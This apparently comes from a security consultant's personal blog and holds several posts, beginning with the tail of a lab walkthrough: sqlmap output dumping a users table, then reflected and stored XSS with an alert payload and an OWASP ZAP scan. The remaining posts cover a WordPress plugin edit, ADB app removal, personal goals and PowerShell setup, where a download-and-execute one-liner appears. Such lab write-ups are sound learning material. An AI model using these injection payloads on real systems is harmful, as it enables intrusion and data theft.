[02:10:10] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/users.csv'
[02:10:10] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times
[02:10:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.112.21'

[*] shutting down at 02:10:10

In the dump you find flag and password but I removed them of course.

Day 6 – Be careful what you wish on a Christmas night

Again we launch both boxes and pull the website up in the browser.

First we get a bit of a feeling for the app by adding a few items and using the search.

Then we try a basic XSS payload in the fields. <script>alert('1')</script>. In the search field, this already triggers.

In the url bar we can see the parameter.

The same payload can be used in the new book field. This results in a stored crosssite scripting. Every time you reload the site, a popup will come up.

For the next part we launch OWASP Zap and give it a moment to update after the starts. Then we start a automated scan of our target.

Basically ZAP finds the two vulnerabilities we already discussed above.

Reload the site again and have a look at what Zap added to the list. It is quite a verbose testing.

Excluding a Category from WordPress main page & RSS feed (quick & dirty)

I recently started a daily writing practice and while just using the existing blog, seemed to be the fastest way, I also did not want the posts in the main blog and RSS feed.

You can find the posts in Notebook category. By default, WordPress does not let you do that though.

Ultimate Category Excluder

The Ultimate Category Excluder (what a name) plugin lets you hide a category from the latest blog posts as well as RSS feeds. It is rather dimple to configure and does what it says it does.

It does however hide the category from all RSS feeds. I anted to have a feed for the category though, so people interested in following the notebook, could subscribe. It also allows for syndication like in Rixx notebook collection.

Quick & Dirty fix

My goal was to set this up quickly and I was already considering just running a hugo or other static generator. That would have taken quite a bit of time to properly set up as well though.

But then I found a post on the plugin’s support forums that describes a quick & dirty fix. In line 152 157 in /plugins/ultimate-category-excluder/ultimate-category-excluder.php change (EDIT: The line changed to 157 with the current version)

if ( $query->is_feed ) {

to

if ( $query->is_feed && !$query->is_archive ) {

It works and from a quick glance at the rest of the plugin’s code should not have further side effects.

That change still comes with one Drawback, I have to do it every time the plugin is updated and I can not rely on the integrity check for the plugin file since it always comes up as changed.

This can only be a short term solution and I would not recommend it for the use in customer projects. I hope excluding a category only from the main feed will be added as a feature to the plugin, but if it does not, I will eventually have to write my own solution.

Uninstalling Preinstalled Android Apps without root

On my Moto G6 every Update seems to re-enable the Outlook and linked-in in apps I disabled on purpose. You can not uninstall apps that have been installed by the manufacturer via the play store or app settings, only disable them.

So far I have been disabling them after each update but I have gotten quite annoyed by it and did a little bit of research to find out how to fully uninstall them.

Prerequisites

What you need is the Android Developer Bridge (ADB) on your computer and you need to enable USB debugging on the phone.

I have used Windows in this guide but there is a great guide on how to set everything up in Windows, Mac & Linux over at XDA-Developers that walks you through the process.

USB Debugging on the Phone

If you haven’t enabled the Developer Mode on your phone yet, you have to navigate to Settings, then System -> About and scroll down to the buid number. Tap this 7 times to enable Developer mode.

Then You will find the Developer Settings in the Systems Settings menu. Go there and enable USB debugging.

ADB on Windows

Setting up ADB on Windows is straight forward. Download the latest ADB version, extract the files in the zip and navigate in Powershell to the extracted folder.

Tipp: You can hold down SHIFT when right-clicking in Explorer and use “Open Powershell here”

From here you can run the adb commands. Since we did not add the folder to the PATH we will have to preface the command with .\ to make it use the adb.exe in this folder.

If you follow this guide on a different OS or have ADB in your PATH you don’t have to use the .\

Connecting the Phone

Connect the phone via USB and double check that USB debugging is enabled.

Then you check for connected devices

.\adb devices                                  

This starts up the ADB service and lists connected devices

* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
ZY322XXXX      unauthorized

On your phone you should get a pop-up asking you to confirm the ADB connection to the computer. After accepting it

.\adb devices                                  

Should list your device now not as unauthorized anymore.

List of devices attached
ZY322XXXX      device

Listing the Apps

.\adb shell pm list packages

Prints out a long list of all installed apps. You can use this list to find the full name of the apps you want to uninstall.

...
package:com.google.android.apps.inputmethod.zhuyin
package:com.microsoft.office.outlook
package:com.google.zxing.client.android
package:com.qualcomm.qti.dynamicddsservice
package:com.google.android.setupwizard
package:eu.siacs.conversations.legacy
package:com.qualcomm.qcrilmsgtunnel
...
package:com.keylesspalace.tusky
package:com.motorola.msimsettings
package:com.android.bookmarkprovider
package:com.linkedin.android
package:com.android.settings
package:com.motorola.arselfie
package:com.qualcomm.qti.lpa
package:com.qualcomm.qti.uim
package:com.google.android.inputmethod.pinyin
...

While you can uninstall most apps like linkedin and outlook you should be more careful with system apps.

Uninstalling the App

.\adb shell pm uninstall --user 0 [Package Name]

Will uninstall the app. So in my case I just had to issue

.\adb shell pm uninstall --user 0 com.microsoft.office.outlook

and

.\adb shell pm uninstall --user 0 com.linkedin.android

Once ADB returns with Success you can unplug your device and are done.

Remember to disable USB Debugging again in your Developer Settings.

Goals: April 2019

I’m usually not a huge fan of making resolutions because I get far too easy into the habit of letting them slip. Because everyone does, right?

But on the other hand, having no goals is not a good thing either. So I’m going to put a bit of pressure on myself by publicly declaring my (non work related) goals for the month.

Blog Stuff

Both as in blogging stuff as well as doing blog related stuff. So what exactly?

  • at least 2 more blog posts
  • make sure everything is GDPR compliant
  • write an about page
  • a few minor tweaks

Reading

I want to finish at least one book on my reading list and make progress on the others:

My reading List in a picture

The Go Programming Language – Donovan & Kernighan

A basic, but rather technical introduction to Go for people who already know how to program in other languages.

I’m using a lot tools written in Go for work and for a curious mind like me this leads to me wanting a better understanding of the language. Usually my brain is pretty roasted after taking care of the baby and work, so I don’t expect to make much progress in this one.

How to solve it – Polya

This is a classic and recommended read for everyone in scientific field or teachers.

Funnily enough it was recommended to me by my math teacher, the math professor while studying chemical biology and my math professor at the computer science classes. But the first two of them were so unlikable that I discarded pretty much everything they recommended. Not to my benefit.

I did read it in my first year of CS at the university and it is a great book. I’m rereading it with two goals in mind:

  • Getting a better grasp of English math terms (reading it in English now, not German as before)
  • Being reminded of the lessons for teachers, so I can explain things better once my daughter is old enough

New solutions for Cybersecurity – Shrobe, Shrier, Pentland

This is a collections of articles about Cybersecurity. I haven’t read anything in it yet, despite buying it close to the release early last year. It got mentioned quite positively in many security podcasts and conversations with colleagues.

There is not even a good reason why I have not read it yet, other than not finding the time for it.

Tribe of hackers – Carey, Jin

Here we have a interview collection with well known Hackers. I’m only in a few but so far it has been very interesting. Each interview is rather short so it fits my short time slots when the baby is busy rather well.

Kindle

Mostly for reading along SciFi audio books. I’m currently at Ryk Browns Frontier sage. But of course an occasional smut book sneaks on there as well.

Wrap up Gaming side projects

I won’t go into details here but I have a rather high number of unfinished gaming related side projects. From updated websites to Star Citizen training modules. I really have to consolidate my commitments in that area. It is getting too much for my currently available free time.

Of course finishing things takes time, but if it goes well, I should have more free time again next month.

Fitness & Diet

I used to work out & train every day as kid and young adult, then dropped the habit when I went to university. It was not exactly a healthy life since about 3 years ago when I started regular workouts again.

But in the last 2 month, since my wife is back at work and I’m alone with the baby, I both lack opportunity and motivation for workouts. In addition I picked up some unhealthy eating habits.

I tried 5 min HIIT workouts last month but being sick for a week got me off track again. So, one more try this month!

Since I added about 3kg of extra weight in the last 2 month, I’ll also put myself on an intermittent fasting once more. It already served me well when getting back into shape 3 years ago.

Will it work?

I have no clue, but it does not seem unrealistic at least. I do need more focus on my goals in my life so this is a start. I’ll tell you in a month how it went.

Poggie

Dusting off the Blog

Photo by Steven Depolo: https://www.flickr.com/photos/stevendepolo/3283663724/

Gosh has it been a while since I started this blog and I only made it to two, now rather outdated posts. Not exactly what I had in mind back then but this is where it is now.

Every time a WordPress update came along or other maintenance tasks had to be done I wanted if I should just get rid of it, but that never felt right. I might return to writing some day.

I guess that day has come!

Writing has always been a way to structure my mind. There probably are several dozen of draft blog posts on my harddrive and while I never got to touching them up well enough for publication, they all served their purose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.

Writing has always been a way to structure my mind. There probably are several dozen of draft blog posts on my hard drive and while I never got to touching them up well enough for publication, they all served their purpose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.

What to expect

The tagline of the blog used to be

security. code. games. learning

That described my goals pretty well but like I said, it never really something from it. Life has changed quite a bit so I adjusted that as well.

security. code. parenting. learning. games.

Security

Eventually I want to get back to some non-NDA security research in my free time, so this stays there for now, even if I don’t expect much security posts to come this year. With changing projects, I’m pretty sure it will change as well.

Code

Like with security, there probably won’t be that many coding related posts in the near future, but security and code to me pretty much go hand in hand. Since I have a few side projects in mind for the next months, there might be something ending up here.

Parenting

We have a 11 month old daughter and I am her main caretaker. So naturally a lot of the stuff on my mind is related to her and how to be a good parent. I don’t intend to post everyday stories but discuss overarching themes and struggles.

Learning

Technically I’m still a computer science student and while I might not be very active at the university right now, this year I’m aiming for a lot of self improvement. Not really sure how much will be worth articles, but sometimes things just are easier understood when written down for others.

Games

Games have been my passion ever since. Tabletop RPGs, Board Games, Poker, LARP (Live Action Roleplay), Computer Games (esp. shooter & MMOs).

How could I not write on occasion about them?

Other Stuff

I’m sure I have forgotten some things, but this is my personal blog, so expect some random stuff as well 😉

Quick Introduction

So who am I?

In a nutshell I’m a IT-Security consultant, have a 11 month old daughter, am married for 4 years now but together with my wife for 16 years. I love games, science and metal, enjoy sports and generally speaking challenges.

And that’s it for now, I’ll eventually put a proper about me section onto the page.

Learning to Draw

So, I decided to learn how to draw.  How did that happen?

I recently updated my amazon wishlist for a friend who wanted some ideas for my birthday. Among a few other things I realized that Betty Edwards’ “Drawing on the right side of the brain” was still on there.

A few years back I put it on there because it was repeatedly referenced in Andy Hunt’s “Refactor Your Wetware. Pragmatic Thinking and Learning” and I was intrigued by the neuro-psychological approach.

It is targeted to people who believe they can not draw and never will be able to. That pretty much is me. I kept it on the list and promised myself, if I get it, I will learn to draw.

Well, I got it. Here I am, learning to draw.

Motivation

Expression

There are a few reasons why I actually want to learn how to draw but certainly the most important is that I want to be able to express my thoughts. In my life there have been several moments where I was not able to express my ideas in an easy to understand way where a short sketch would have made all the difference. If I knew how to draw one.

Want a recent example? Okay, I’ll embarrass myself.

ShirtSketch

This is a sketch on my whiteboard where I tried to explain my wife a design for a new top she should create. She knows me quite well so she got what I had in mind but it took time.

It is meant to be a tight fitting shirt / blouse with a transparent cutout in feather / wings optics and a repetition of the theme on the sleeves. You can get the concept from the sketch but in my mind it looks quite different.

Creative outlet

While I was never good at drawing, I always had creative outlets in my life. From (artistic) circus shows to storytelling in role-play games over cooking to writing and of course coding.

I am not in the shape for artistic shows anymore (something I eventually want to change again). Being burned out a little on writing, coding and role-playing, I want to give drawing a chance. Do I want to become an artist? No. I will leave that to talents like Harlequin But it might be something for every now and then, when the other ways to express my creativity don’t work.

Where do I go from here?

I just finished drawing the first three ‘images’. They are part of the pre-course preparations to be able to compare them to the results after reading and working through the book. I won’t publish them now but most likely once I’m done to show the before – after comparison.

I won’t be reading or drawing every day and more importantly I probably won’t post about it that often. Only important milestones or when I feel like writing 😉

Windows Commandline Tools

Since I am usually doing most development on my Linux Laptop a decent commandline interface is something I want on windows as well. Most of this setup is inspired by this totally tooling tip.

The windows powershell on its own is quite powerful already but can be enhanced quite a bit.

Setting powershell up

Most enhancements to powershell come as modules. With PSGet you they can be managed easily. But to be able to run modules, the execution policy has to be set to allows external modules.

Set-ExecutionPolicy RemoteSigned

After that the command from PSGet installs the module manager.

(new-object Net.WebClient).DownloadString("http://psget.net/GetPsGet.ps1") | iex

Microsoft has a Knowlagebase article about the execution policy

Setting powershell up

Most enhancements to powershell come as modules. With PSGet you they can be managed easily. But to be able to run modules, the execution policy has to be set to allows external modules.

Set-ExecutionPolicy RemoteSigned

After that the command from PSGet installs the module manager.

(new-object Net.WebClient).DownloadString("http://psget.net/GetPsGet.ps1") | iex

Microsoft has a Knowlagebase article about the execution policy

Git integration

Posh provides comandline integration for my favorite version control system and can be installed with:

Install-Module posh-git

Now powershell provides tap completion for git and a custom prompt once in a folder with a git repository.

SSH

My Servers usually run on Unix as well so I have to connect to them via SSH. In the past I used putty on windows but it has grown a bit old.

While Microsoft is planing SSH support for Powershell for the future, I wanted it now and there is a module for that too: POSH-SSH

Again it is installed with a one liner that you copy from their page.

The modules Author has written a nice article about how to use it.

Cmder

A really nice collection of powershell modules, skins and a way to have taps, split the window in multiple consoles and so on is cmder. The draw back is that their modules are not signed and you have to lower the rules of the execution policy even further.

Powered by WordPress & Theme by Anders Norén